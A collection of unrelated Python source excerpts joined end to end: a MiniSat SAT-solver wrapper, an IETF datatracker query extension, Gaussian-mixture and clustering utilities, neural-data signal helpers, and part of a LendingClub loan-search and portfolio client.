if type(bootstrap_with) == CNFPlus and bootstrap_with.atmosts:
raise NotImplementedError('Atmost constraints are not supported by MiniSat')
for clause in bootstrap_with:
self.add_clause(clause)
self.use_timer = use_timer
self.call_time = 0.0 # time spent for the last call to oracle
self.accu_time = 0.0 # time accumulated for all calls to oracle
def delete(self):
"""
Destructor.
"""
if self.minisat:
pysolvers.minisatgh_del(self.minisat)
self.minisat = None
def solve(self, assumptions=[]):
"""
Solve internal formula.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisatgh_solve(self.minisat, assumptions,
int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def solve_limited(self, assumptions=[], expect_interrupt=False):
"""
Solve internal formula using given budgets for conflicts and
propagations.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisatgh_solve_lim(self.minisat,
assumptions, int(MainThread.check()), int(expect_interrupt))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def conf_budget(self, budget):
"""
Set limit on the number of conflicts.
"""
if self.minisat:
pysolvers.minisatgh_cbudget(self.minisat, budget)
def prop_budget(self, budget):
"""
Set limit on the number of propagations.
"""
if self.minisat:
pysolvers.minisatgh_pbudget(self.minisat, budget)
def interrupt(self):
"""
Interrupt solver execution.
"""
if self.minisat:
pysolvers.minisatgh_interrupt(self.minisat)
def clear_interrupt(self):
"""
Clears an interruption.
"""
if self.minisat:
pysolvers.minisatgh_clearint(self.minisat)
def propagate(self, assumptions=[], phase_saving=0):
"""
Propagate a given set of assumption literals.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
st, props = pysolvers.minisatgh_propagate(self.minisat,
assumptions, phase_saving, int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return bool(st), props if props != None else []
def set_phases(self, literals=[]):
"""
Sets polarities of a given list of variables.
"""
if self.minisat:
pysolvers.minisatgh_setphases(self.minisat, literals)
def get_status(self):
"""
Returns solver's status.
"""
if self.minisat:
return self.status
def get_model(self):
"""
Get a model if the formula was previously satisfied.
"""
if self.minisat and self.status == True:
model = pysolvers.minisatgh_model(self.minisat)
return model if | |
<reponame>glasgow-ipl/ietfdata
# Copyright (C) 2020-2021 University of Glasgow
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from datetime import datetime, timedelta
from ietfdata.datatracker import *
from ietfdata.rfcindex import *
# =================================================================================================================================
# Private helper functions
def names_to_try(name: str, email: str) -> List[str]:
names = []
# Derive alternative names to try:
if name != "":
names.append(name)
split = name.split()
# If given, e.g., "<NAME>" also try "<NAME>":
if len(split) == 3 and len(split[1]) == 2 and split[1][0].isalpha() and split[1][1] == ".":
alias = split[0] + " " + split[2]
names.append(alias)
# If given, e.g., "<NAME>" also try "<NAME>::
if len(split) == 2 and len(split[0]) >= 2 and split[0][-1] == ",":
alias = split[1] + " " + split[0][:-1]
names.append(alias)
# If given, e.g. "<NAME> (csperkins)" also try "<NAME>":
if len(split) == 3 and len(split[2]) >= 2 and split[2][0] == "(" and split[2][-1] == ")":
alias = split[0] + " " + split[1]
names.append(alias)
# Derive names from the email address:
if "@" in email:
local, remote = email.split("@")
if local.endswith(".ietf") or local.endswith("-ietf") or local.endswith("+ietf"):
local = local[:-5]
split = local.split(".")
# If given, e.g., "<EMAIL>" also try "<NAME>":
if len(split) == 2 and len(split[0]) > 1 and len(split[1]) > 1:
alias = split[0][0].upper() + split[0][1:] + " " + split[1][0].upper() + split[1][1:]
names.append(alias)
# If given, e.g., "<EMAIL>" also try "<NAME>" and "<NAME>":
if len(split) == 3 and len(split[0]) > 1 and len(split[1]) == 1 and len(split[2]) > 1:
alias = split[0][0].upper() + split[0][1:] + " " + split[1].upper() + ". " + split[2][0].upper() + split[2][1:]
names.append(alias)
alias = split[0][0].upper() + split[0][1:] + " " + split[2][0].upper() + split[2][1:]
names.append(alias)
return names
# =================================================================================================================================
@dataclass
class DraftHistory:
draft : Document
rev : str
date : datetime
submission : Optional[Submission]
class DataTrackerExt(DataTracker):
"""
The `DataTrackerExt` class extends the `DataTracker` with methods that
perform complex queries across multiple API endpoints.
"""
def __init__(self,
use_cache: bool = False,
mongodb_hostname: str = "localhost",
mongodb_port: int = 27017,
mongodb_username: Optional[str] = None,
mongodb_password: Optional[str] = None):
super().__init__(use_cache, mongodb_hostname, mongodb_port, mongodb_username, mongodb_password)
def draft_history(self, draft: Document, drafts_seen: List[Document] = []) -> List[DraftHistory]:
"""
Find the previous versions of an Internet-Draft
"""
assert draft.type == DocumentTypeURI("/api/v1/name/doctypename/draft/")
drafts : List[DraftHistory] = []
if draft in drafts_seen:
return []
else:
drafts_seen.append(draft)
# Step 1: Use document_events() to find previous versions of the draft.
for event in self.document_events(doc=draft, event_type="new_revision"):
drafts.append(DraftHistory(draft, event.rev, event.time, None))
# Step 2: Find the submissions, and add them to the previously found
# draft versions. Some versions of a draft may not have a submission.
# While we're doing this, record any drafts the submissions are marked
# as replacing.
submissions : List[Submission] = []
replaces : List[Document] = []
for submission_uri in draft.submissions:
submission = self.submission(submission_uri)
if submission is not None:
submissions.append(submission)
if submission.replaces != "":
for replaces_draft in submission.replaces.split(","):
replaces_doc = self.document_from_draft(replaces_draft)
if replaces_doc is not None:
found = False
for r in replaces:
if r.name == replaces_doc.name:
found = True
break
if not found:
replaces.append(replaces_doc)
for submission in submissions:
found = False
for d in drafts:
if d.draft.resource_uri == submission.draft and d.rev == submission.rev:
d.submission = submission
found = True
break
if not found:
drafts.append(DraftHistory(draft, submission.rev, submission.submission_date, submission))
# Step 3: Use related_documents() to find additional drafts this replaces:
for related in self.related_documents(source=draft, relationship_type=self.relationship_type_from_slug("replaces")):
alias = self.document_alias(related.target)
if alias is not None:
reldoc = self.document(alias.document)
if reldoc is not None:
found = False
for r in replaces:
if r.name == reldoc.name:
found = True
break
if not found:
replaces.append(reldoc)
# Step 4: Process the drafts this replaces, to find earlier versions:
for r in replaces:
if r.name != draft.name:
drafts.extend(self.draft_history(r, drafts_seen=drafts_seen))
return list(reversed(sorted(drafts, key=lambda d: d.date)))
def draft_history_for_rfc(self, rfc: RfcEntry) -> List[DraftHistory]:
"""
Use the DataTracker to find the draft versions of a given RFC.
The `RfcEntry` contains a `draft` field that (usually) points to the
final draft before the document became an RFC. This function follows
the history of the document back to the original submission to find
all prior drafts.
Note that earlier RFCs and "April Fools" RFCs do not exist in draft
form, so this may return an empty list.
"""
final_draft = None
if rfc.draft is not None:
final_draft = self.document_from_draft(rfc.draft[:-3])
if final_draft is None:
final_draft = self.document_from_rfc(rfc.doc_id)
else:
final_draft = self.document_from_rfc(rfc.doc_id)
if final_draft is not None:
return self.draft_history(final_draft)
else:
return []
def iab_chair(self) -> Person:
chairs = list(self.group_roles(group = self.group_from_acronym("iab"), name = self.role_name_from_slug("chair")))
assert(len(chairs) == 1) # There is only one IAB chair
chair = self.person(chairs[0].person)
assert chair is not None
return chair
def iab_members(self) -> Iterator[Person]:
for member in self.group_roles(group = self.group_from_acronym("iab"), name = self.role_name_from_slug("member")):
person = self.person(member.person)
assert person is not None
yield person
def ietf_chair(self) -> Person:
chairs = list(self.group_roles(group = self.group_from_acronym("ietf"), name = self.role_name_from_slug("chair")))
assert(len(chairs) == 1) # There is only one IETF chair
chair = self.person(chairs[0].person)
assert chair is not None
return chair
def iesg_members(self) -> Iterator[Person]:
for member in self.group_roles(group = self.group_from_acronym("iesg"), name = self.role_name_from_slug("ad")):
person = self.person(member.person)
assert person is not None
yield person
def irtf_chair(self) -> Person:
chairs = list(self.group_roles(group = self.group_from_acronym("irtf"), name = self.role_name_from_slug("chair")))
assert(len(chairs) == 1) # There is only one IRTF chair
chair = self.person(chairs[0].person)
assert chair is not None
return chair
def irsg_members(self) -> Iterator[Person]:
for member in self.group_roles(group = self.group_from_acronym("irsg")):
person = self.person(member.person)
assert person is not None
yield person
def active_research_groups(self) -> Iterator[Group]:
active_state = self.group_state_from_slug("active")
research_group = self.group_type_name_from_slug("rg")
for group in self.groups(parent = self.group_from_acronym("irtf")):
t = self.group_type_name(group.type)
s = self.group_state(group.state)
if s == active_state and t == research_group:
yield group
def research_group_chairs(self) -> Iterator[Person]:
chair = self.role_name_from_slug("chair")
chairs = set()
for group in self.active_research_groups():
for role in self.group_roles(group = group, name = chair):
person = self.person(role.person)
assert person is not None
if person.id not in chairs: # people can chair more than one group
chairs.add(person.id)
yield person
def concluded_research_groups(self) -> Iterator[Group]:
concluded_state = self.group_state_from_slug("conclude")
research_group = self.group_type_name_from_slug("wg")
for group in self.groups(parent = self.group_from_acronym("irtf")):
t = self.group_type_name(group.type)
s = self.group_state(group.state)
if s == concluded_state and t == research_group:
yield group
def active_working_groups(self) -> Iterator[Group]:
active_state = self.group_state_from_slug("active")
working_group = self.group_type_name_from_slug("wg")
for area in self.groups(parent = self.group_from_acronym("iesg")):
if self.group_state(area.state) == active_state:
for group in self.groups(parent = area):
t = self.group_type_name(group.type)
s = self.group_state(group.state)
if s == active_state and t == working_group:
yield group
def working_group_chairs(self) -> Iterator[Person]:
chair = self.role_name_from_slug("chair")
chairs = set()
for group in self.active_working_groups():
for role in self.group_roles(group = group, name = chair):
person = self.person(role.person)
assert person is not None
if person.id not in chairs: # people can chair more than one group
chairs.add(person.id)
yield person
def next_ietf_meeting(self) -> Optional[Meeting]:
"""
Return the next upcoming, or currently ongoing, IETF meeting.
"""
next_meeting = None
for meeting in self.meetings(meeting_type = self.meeting_type_from_slug("ietf")):
if meeting.status() == MeetingStatus.ONGOING:
next_meeting = meeting
break
elif meeting.status() == MeetingStatus.FUTURE:
if next_meeting is None | |
X = newCluster
else:
X = np.append(X,newCluster,axis=0)
if normalize is not None:
if normalize in ['l_2-unit-ball']:
maxNorm = np.linalg.norm(X,axis=1).max() + 1e-6 # plus smth to have
elif normalize in ['l_inf-unit-ball']:
maxNorm = np.abs(X).max() + 1e-6
else:
raise Exception('Unreckognized normalization method ({}). Aborting.'.format(normalize))
# Normalize by maxNorm
X /= maxNorm
return X
def generateSpiralDataset(n,normalize=None,return_density=False):
"""
Generate a synthetic 2-D dataset made of a spiral.
Parameters
----------
n: int, the number of elements in the dataset (cardinality)
normalize: string (default=None), if not None describes how to normalize the dataset. Available options:
- 'l_2-unit-ball': the dataset is scaled in the l_2 unit ball (i.e., all l_2 norms are <= 1)
- 'l_inf-unit-ball': the dataset is projected in the l_inf unit ball (i.e., all entries are <= 1)
Returns
-------
out: X: (n,d)-numpy array containing the samples.
"""
## Initialization
X = None
# Spiral parameters
n_spirals = 1
min_radius = 0.3
delta_radius_per_spiral = 1.2
radius_noise = 0.01
# parameter
t = np.random.uniform(0,n_spirals,n)
Rs = min_radius + delta_radius_per_spiral*t + radius_noise*np.random.randn(n)
thetas = np.remainder(2*np.pi*t,2*np.pi)
x1 = np.expand_dims(np.cos(thetas)*Rs,axis=1)
x2 = np.expand_dims(np.sin(thetas)*Rs,axis=1)
X = np.concatenate((x1,x2),axis=1)
maxNorm = 1
if normalize is not None:
if normalize in ['l_2-unit-ball']:
maxNorm = np.linalg.norm(X,axis=1).max() + 1e-6 # plus smth to have no round error
elif normalize in ['l_inf-unit-ball']:
maxNorm = np.abs(X).max() + 1e-6
else:
raise Exception('Unreckognized normalization method ({}). Aborting.'.format(normalize))
# Normalize by maxNorm
X /= maxNorm
# Compute the density function too
def pdf(x):
# Compute polar coordinates TODO SUPPORT FOR N SPIRALS > 1
x1 = x[0] * maxNorm
x2 = x[1] * maxNorm
r = np.sqrt(x1**2+x2**2)
th = np.arctan2(x2,x1)
if th<0:
th += 2*np.pi
return (1/(2*np.pi)) * (scipy.stats.norm.pdf(r, loc=min_radius + delta_radius_per_spiral*th/(2*np.pi), scale=radius_noise)) / r # First part comes from theta, second from R
if return_density:
return (X,pdf)
return X
def generatedataset_Ksparse(d,K,n,max_radius=1):
"""
Generate a synthetic dataset of K-sparse vectors in dimension d, with l_2 norm <= max_radius.
Parameters
----------
d: int, the dataset dimension
K: int, the sparsity level (vectors have at most K nonzero entries)
n: int, the number of elements in the dataset (cardinality)
max_radius: real>0, vectors are drawn uniformy in the l_2 ball of radius max_radius
Returns
-------
X: (n,d)-numpy array containing the samples
"""
# Random points in a ball
r = max_radius*(np.random.uniform(0,1,size=n)**(1/K)) # Radius, sqrt for uniform density
v = np.random.randn(n,d) # Random direction
X = (v.T*(1/np.linalg.norm(v,axis=1))*r).T
# Random support (sets to zero the coefficients not in the support)
for i in range(n):
X[i,np.random.permutation(d)[K:]] = 0
return X
############################
# METHODS #
############################
def EM_GMM(X, K, max_iter=20, nRepetitions=1):
"""Usual Expectation-Maximization (EM) algorithm for fitting mixture of Gaussian models (GMM).
Parameters
----------
X: (n,d)-numpy array, the dataset of n examples in dimension d
K: int, the number of Gaussian modes
Additional Parameters
---------------------
max_iter: int (default 20), the number of EM iterations to perform
nRepetitions: int (default 1), number of independent EM runs to perform (returns the best)
Returns: a tuple (w,mus,Sigmas) of three numpy arrays
- w: (K,) -numpy array containing the weigths ('mixing coefficients') of the Gaussians
- mus: (K,d) -numpy array containing the means of the Gaussians
- Sigmas: (K,d,d)-numpy array containing the covariance matrices of the Gaussians
"""
# TODO to improve:
# - detect early convergence
# Parse input
(n,d) = X.shape
lowb = np.amin(X,axis=0)
uppb = np.amax(X,axis=0)
bestGMM = None
bestScore = -np.inf
for rep in range(nRepetitions):
# Initializations
w = np.ones(K)
mus = np.empty((K,d))
Sigmas = np.empty((K,d,d)) # Covariances are initialized as random diagonal covariances, with folded Gaussian values
for k in range(K):
mus[k] = np.random.uniform(lowb,uppb)
Sigmas[k] = np.diag(np.abs(np.random.randn(d)))
r = np.empty((n,K)) # Matrix of posterior probabilities, here memory allocation only
# Main loop
for i in range(max_iter):
# E step
for k in range(K):
r[:,k] = w[k]*scipy.stats.multivariate_normal.pdf(X, mean=mus[k], cov=Sigmas[k],allow_singular=True)
r = (r.T/np.sum(r,axis=1)).T # Normalize (the posterior probabilities sum to 1). Dirty :-(
# M step: 1) update w
w = np.sum(r,axis=0)/n
# M step: 2) update centers
for k in range(K):
mus[k] = r[:,k]@X/np.sum(r[:,k])
# M step: 3) update Sigmas
for k in range(K):
# Dumb implementation
num = np.zeros((d,d))
for i in range(n):
num += r[i,k]*np.outer(X[i]-mus[k],X[i]-mus[k])
Sigmas[k] = num/np.sum(r[:,k])
# (end of one EM iteration)
# (end of one EM run)
newGMM = (w,mus,Sigmas)
newScore = loglikelihood_GMM(newGMM,X)
if newScore > bestScore:
bestGMM = newGMM
bestScore = newScore
return bestGMM
############################
# METRICS #
############################
def SSE(X,C):
"""Computes the Sum of Squared Errors of some centroids on a dataset, given by
SSE(X,C) = sum_{x_i in X} min_{c_k in C} ||x_i-c_k||_2^2.
Arguments:
- X: (n,d)-numpy array, the dataset of n examples in dimension d
- C: (K,d)-numpy array, the K centroids in dimension d
Returns:
- SSE: real, the SSE score defined above
"""
distances = scipy.spatial.distance.cdist(X, C, 'sqeuclidean')
return np.min(distances,axis=1).sum()
def loglikelihood_GMM(P,X,robust = True):
"""Computes the loglikelihood of GMM model P on data X, defined as follows:
loglikelihood = (1/n) * sum_{i=1..n} log(sum_{k=1..K} (w_k)*N(x_i ; mu_k, Sigma_k) )
Arguments:
- P: tuple of three numpy arrays describing the GMM model of form (w,mus,Sigmas)
- w : (K,)-numpy array, the weights of the K Gaussians (should sum to 1)
- mus : (K,d)-numpy array containing the means of the Gaussians
- Sigmas : (K,d,d)-numpy array containing the covariance matrices of the Gaussians
- X: (n,d)-numpy array, the dataset of n examples in dimension d
- robust: bool (default = True), if True, avoids -inf output due to very small probabilities
(note: execution will be slower)
Returns:
- loglikelihood: real, the loglikelihood value defined above
"""
# Unpack
(w,mu,Sig) = P
(K,d) = mu.shape
logp = np.zeros(X.shape[0])
p = np.zeros(X.shape[0])
try:
for k in range(K):
p += w[k]*scipy.stats.multivariate_normal.pdf(X, mean=mu[k], cov=Sig[k], allow_singular=False)
with np.errstate(divide='ignore'): # ignore divide by zero warning
logp = np.log(p)
except np.linalg.LinAlgError:
if robust:
b = np.zeros(K)
a = np.zeros(K)
Sig_inv = np.zeros(Sig.shape)
for k in range(K):
a[k] = w[k]*((2*np.pi)**(-d/2))*(np.linalg.det(Sig[k])**(-1/2))
Sig_inv[k] = np.linalg.inv(Sig[k])
for i in range(p.size): # Replace the inf values due to rounding p to 0
for k in range(K):
b[k] = -(X[i]-mu[k])@Sig_inv[k]@(X[i]-mu[k])/2
lc = b.max()
ebc = np.exp(b-lc)
logp[i] = np.log(ebc@a) + lc
else:
raise np.linalg.LinAlgError('singular matrix')
return np.mean(logp)
def symmKLdivergence_GMM(P1,P2,Neval = 500000):
"""Computes the symmetric KL divergence between two GMM densities."""
# TODO : a version that adapts Neval s.t. convergence?
# Unpack
(w1,mu1,Sig1) = P1
(w2,mu2,Sig2) = P2
K1 = w1.size
K2 = w2.size
Neval # Number of samples to evaluate the KL divergence
# dumb implem for now, TODO FAST IMPLEM!
KLestimate = 0.
assignations1 = np.random.choice(K1,Neval,p=w1)
for k1 in range(K1):
N1 = np.count_nonzero(assignations1 == k1)
Y = np.random.multivariate_normal(mu1[k1], Sig1[k1], N1)
P1 = np.zeros(N1)
for k in range(K1):
P1 += w1[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu1[k], cov=Sig1[k], allow_singular=True)
P2 = np.zeros(N1)
for k in range(K2):
P2 += w2[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu2[k], cov=Sig2[k], allow_singular=True)
# Avoid numerical instabilities
P2[np.where(P2<=1e-25)[0]] = 1e-25
KLestimate += np.sum(np.log(P1/P2))
assignations2 = np.random.choice(K2,Neval,p=w2)
for k2 in range(K2):
N2 = np.count_nonzero(assignations2 == k2)
Y = np.random.multivariate_normal(mu2[k2], Sig2[k2], N2)
P1 = np.zeros(N2)
for k in range(K1):
P1 += w1[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu1[k], cov=Sig1[k], allow_singular=True)
P2 = np.zeros(N2)
for k in range(K2):
P2 += w2[k]*scipy.stats.multivariate_normal.pdf(Y, mean=mu2[k], cov=Sig2[k], allow_singular=True)
# Avoid numerical instabilities
P1[np.where(P1<=1e-25)[0]] = 1e-25
KLestimate += np.sum(np.log(P2/P1))
KLestimate /= 2*Neval
return KLestimate
############################
# VISUALIZATION #
############################
from matplotlib.patches import Ellipse
from scipy.stats import chi2
def plotGMM(X=None,P=None,dims=(0,1),d=2,proportionInGMM = None):
"""
Plots a Gaussian mixture model (and associated data) in 2 dimensions.
Parameters
----------
X: (n,d)-numpy array, the dataset of n examples in dimension d (optional)
P: a a tuple (w,mus,Sigmas) of three numpy arrays describing the Gaussian mixture model, where
- w: (K,) -numpy array containing the weigths ('mixing coefficients') of the Gaussians
- mus: (K,d) -numpy array containing the means of the Gaussians
| |
return np.asarray(bdries)
def get_direction(asa, *, sigma=None):
"""Return epochs during which an animal was running left to right, or right
to left.
Parameters
----------
asa : AnalogSignalArray 1D
AnalogSignalArray containing the 1D position data.
sigma : float, optional
Smoothing to apply to position (x) before computing gradient estimate.
Default is 0.
Returns
-------
l2r, r2l : EpochArrays
EpochArrays corresponding to left-to-right and right-to-left movement.
"""
if sigma is None:
sigma = 0
if not isinstance(asa, core.AnalogSignalArray):
raise TypeError('AnalogSignalArray expected!')
assert asa.n_signals == 1, "1D AnalogSignalArray expected!"
direction = dxdt_AnalogSignalArray(asa.smooth(sigma=sigma),
rectify=False).data
direction[direction>=0] = 1
direction[direction<0] = -1
direction = direction.squeeze()
l2r = get_contiguous_segments(np.argwhere(direction>0).squeeze(), step=1)
l2r[:,1] -= 1 # change bounds from [inclusive, exclusive] to [inclusive, inclusive]
l2r = core.EpochArray(asa.abscissa_vals[l2r])
r2l = get_contiguous_segments(np.argwhere(direction<0).squeeze(), step=1)
r2l[:,1] -= 1 # change bounds from [inclusive, exclusive] to [inclusive, inclusive]
r2l = core.EpochArray(asa.abscissa_vals[r2l])
return l2r, r2l
class PrettyBytes(int):
"""Prints number of bytes in a more readable format"""
def __init__(self, val):
self.val = val
def __str__(self):
if self.val < 1024:
return '{} bytes'.format(self.val)
elif self.val < 1024**2:
return '{:.3f} kilobytes'.format(self.val/1024)
elif self.val < 1024**3:
return '{:.3f} megabytes'.format(self.val/1024**2)
elif self.val < 1024**4:
return '{:.3f} gigabytes'.format(self.val/1024**3)
def __repr__(self):
return self.__str__()
class PrettyInt(int):
"""Prints integers in a more readable format"""
def __init__(self, val):
self.val = val
def __str__(self):
return '{:,}'.format(self.val)
def __repr__(self):
return '{:,}'.format(self.val)
class PrettyDuration(float):
"""Time duration with pretty print.
Behaves like a float, and can always be cast to a float.
"""
def __init__(self, seconds):
self.duration = seconds
def __str__(self):
return self.time_string(self.duration)
def __repr__(self):
return self.time_string(self.duration)
@staticmethod
def to_dhms(seconds):
"""convert seconds into hh:mm:ss:ms"""
pos = seconds >= 0
if not pos:
seconds = -seconds
ms = seconds % 1; ms = round(ms*10000)/10
seconds = floor(seconds)
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
Time = namedtuple('Time', 'pos dd hh mm ss ms')
time = Time(pos=pos, dd=d, hh=h, mm=m, ss=s, ms=ms)
return time
@staticmethod
def time_string(seconds):
"""returns a formatted time string."""
if np.isinf(seconds):
return 'inf'
pos, dd, hh, mm, ss, s = PrettyDuration.to_dhms(seconds)
if s > 0:
if mm == 0:
# in this case, represent milliseconds in terms of
# seconds (i.e. a decimal)
sstr = str(s/1000).lstrip('0')
if s >= 999.5:
ss += 1
s = 0
sstr = ""
# now propagate the carry:
if ss == 60:
mm += 1
ss = 0
if mm == 60:
hh +=1
mm = 0
if hh == 24:
dd += 1
hh = 0
else:
# for all other cases, milliseconds will be represented
# as an integer
if s >= 999.5:
ss += 1
s = 0
sstr = ""
# now propagate the carry:
if ss == 60:
mm += 1
ss = 0
if mm == 60:
hh +=1
mm = 0
if hh == 24:
dd += 1
hh = 0
else:
sstr = ":{:03d}".format(int(s))
else:
sstr = ""
if dd > 0:
daystr = "{:01d} days ".format(dd)
else:
daystr = ""
if hh > 0:
timestr = daystr + "{:01d}:{:02d}:{:02d}{} hours".format(hh, mm, ss, sstr)
elif mm > 0:
timestr = daystr + "{:01d}:{:02d}{} minutes".format(mm, ss, sstr)
elif ss > 0:
timestr = daystr + "{:01d}{} seconds".format(ss, sstr)
else:
timestr = daystr +"{} milliseconds".format(s)
if not pos:
timestr = "-" + timestr
return timestr
def __add__(self, other):
"""a + b"""
return PrettyDuration(self.duration + other)
def __radd__(self, other):
"""b + a"""
return self.__add__(other)
def __sub__(self, other):
"""a - b"""
return PrettyDuration(self.duration - other)
def __rsub__(self, other):
"""b - a"""
return other - self.duration
def __mul__(self, other):
"""a * b"""
return PrettyDuration(self.duration * other)
def __rmul__(self, other):
"""b * a"""
return self.__mul__(other)
def __truediv__(self, other):
"""a / b"""
return PrettyDuration(self.duration / other)
def shrinkMatColsTo(mat, numCols):
""" Docstring goes here
Shrinks a NxM1 matrix down to an NxM2 matrix, where M2 <= M1"""
import scipy.ndimage
numCells = mat.shape[0]
numColsMat = mat.shape[1]
a = np.zeros((numCells, numCols))
for row in np.arange(numCells):
niurou = scipy.ndimage.interpolation.zoom(input=mat[row,:], zoom=(numCols/numColsMat), order = 1)
a[row,:] = niurou
return a
def find_threshold_crossing_events(x, threshold, *, mode='above'):
"""Find threshold crossing events. INCLUSIVE
Parameters
----------
x : numpy array
Input data
threshold : float
The value whose crossing triggers an event
mode : string, optional in ['above', 'below']; default 'above'
event triggering above, or below threshold
Returns
-------
eventlist : list
List containing the indices corresponding to threshold crossings
eventmax : list
List containing the maximum value of each event
"""
from itertools import groupby
from operator import itemgetter
if mode == 'below':
cross_threshold = np.where(x <= threshold, 1, 0)
elif mode == 'above':
cross_threshold = np.where(x >= threshold, 1, 0)
else:
raise NotImplementedError(
"mode {} not understood for find_threshold_crossing_events".format(str(mode)))
eventlist = []
eventmax = []
for k,v in groupby(enumerate(cross_threshold),key=itemgetter(1)):
if k:
v = list(v)
eventlist.append([v[0][0],v[-1][0]])
try :
eventmax.append(x[v[0][0]:(v[-1][0]+1)].max())
except :
print(v, x[v[0][0]:v[-1][0]])
eventmax = np.asarray(eventmax)
eventlist = np.asarray(eventlist)
return eventlist, eventmax
def get_events_boundaries(x, *, PrimaryThreshold=None,
SecondaryThreshold=None,
minThresholdLength=None, minLength=None,
maxLength=None, ds=None, mode='above'):
"""get event boundaries such that event.max >= PrimaryThreshold
and the event extent is defined by SecondaryThreshold.
Note that when PrimaryThreshold==SecondaryThreshold, then this is a
simple threshold crossing algorithm.
NB. minLength and maxLength are applied to the SecondaryThreshold
events, whereas minThresholdLength is applied to the
PrimaryThreshold events.
Parameters
----------
x : numpy array
Input data
mode : string, optional in ['above', 'below']; default 'above'
event triggering above, or below threshold
PrimaryThreshold : float, optional
If mode=='above', requires that event.max >= PrimaryThreshold
If mode=='below', requires that event.min <= PrimaryThreshold
SecondaryThreshold : float, optional
The value that defines the event extent
minThresholdLength : float, optional
Minimum duration for which the PrimaryThreshold is crossed
minLength : float, optional
Minimum duration for which the SecondaryThreshold is crossed
maxLength : float, optional
Maximum duration for which the SecondaryThreshold is crossed
ds : float, optional
Time step of the input data x
Returns
-------
returns bounds, maxes, events
where bounds <==> SecondaryThreshold to SecondaryThreshold, inclusive
maxes <==> maximum value during each event
events <==> PrimaryThreshold to PrimaryThreshold, inclusive
"""
# TODO: x must be a numpy array
# TODO: ds is often used, but we have no default, and no check for when
# it is left as None.
# TODO: the Docstring should equally be improved.
x = x.squeeze()
if x.ndim > 1:
raise TypeError("multidimensional arrays not supported!")
if PrimaryThreshold is None: # by default, threshold is 3 SDs above mean of x
PrimaryThreshold = np.mean(x) + 3*np.std(x)
if SecondaryThreshold is None: # by default, revert back to mean of x
SecondaryThreshold = np.mean(x) # + 0*np.std(x)
events, _ = \
find_threshold_crossing_events(x=x,
threshold=PrimaryThreshold,
mode=mode)
# apply minThresholdLength criterion:
if minThresholdLength is not None and len(events) > 0:
durations = (events[:,1] - events[:,0] + 1) * ds
events = events[[durations >= minThresholdLength]]
if len(events) == 0:
bounds, maxes, events = [], [], []
logging.warning("no events satisfied criteria")
return bounds, maxes, events
# Find periods where value is > SecondaryThreshold; note that the previous periods should be within these!
if mode == 'above':
assert SecondaryThreshold <= PrimaryThreshold, \
"Secondary Threshold by definition should include more data than Primary Threshold"
elif mode == 'below':
assert SecondaryThreshold >= PrimaryThreshold, \
"Secondary Threshold by definition should include more data than Primary Threshold"
else:
raise NotImplementedError(
"mode {} not understood for find_threshold_crossing_events".format(str(mode)))
bounds, broader_maxes = \
find_threshold_crossing_events(x=x,
threshold=SecondaryThreshold,
mode=mode)
# Find corresponding big windows for potential events
# Specifically, look for closest left edge that is just smaller
outer_boundary_indices = np.searchsorted(bounds[:,0], events[:,0], side='right')
# searchsorted finds the index after, so subtract one to get index before
outer_boundary_indices = outer_boundary_indices - 1
# Find extended boundaries for events by pairing to larger windows
# (Note that there may be repeats if the larger window contains multiple > 3SD sections)
bounds = bounds[outer_boundary_indices,:]
maxes = broader_maxes[outer_boundary_indices]
if minLength is not None and len(events) > 0:
durations = (bounds[:,1] - bounds[:,0] + 1) * ds
# TODO: refactor [durations <= maxLength] but be | |
response.json()
if self.session.json_success(json_response):
results = json_response['searchresult']
# Normalize results by converting loanGUID -> loan_id
for loan in results['loans']:
loan['loan_id'] = int(loan['loanGUID'])
# Validate that fractions do indeed match the filters
if filters is not None:
filters.validate(results['loans'])
return results
return False
def build_portfolio(self, cash, max_per_note=25, min_percent=0, max_percent=20, filters=None, automatically_invest=False, do_not_clear_staging=False):
"""
Returns a list of loan notes that are diversified by your min/max percent request and filters.
One way to invest in these loan notes, is to start an order and use add_batch to add all the
loan fragments to them. (see examples)
Parameters
----------
cash : int
The total amount you want to invest across a portfolio of loans (at least $25).
max_per_note : int, optional
The maximum dollar amount you want to invest per note. Must be a multiple of 25
min_percent : int, optional
THIS IS NOT PER NOTE, but the minimum average percent of return for the entire portfolio.
max_percent : int, optional
THIS IS NOT PER NOTE, but the maxmimum average percent of return for the entire portfolio.
filters : lendingclub.filters.*, optional
The filters to use to search for portfolios
automatically_invest : boolean, optional
If you want the tool to create an order and automatically invest in the portfolio that matches your filter.
(default False)
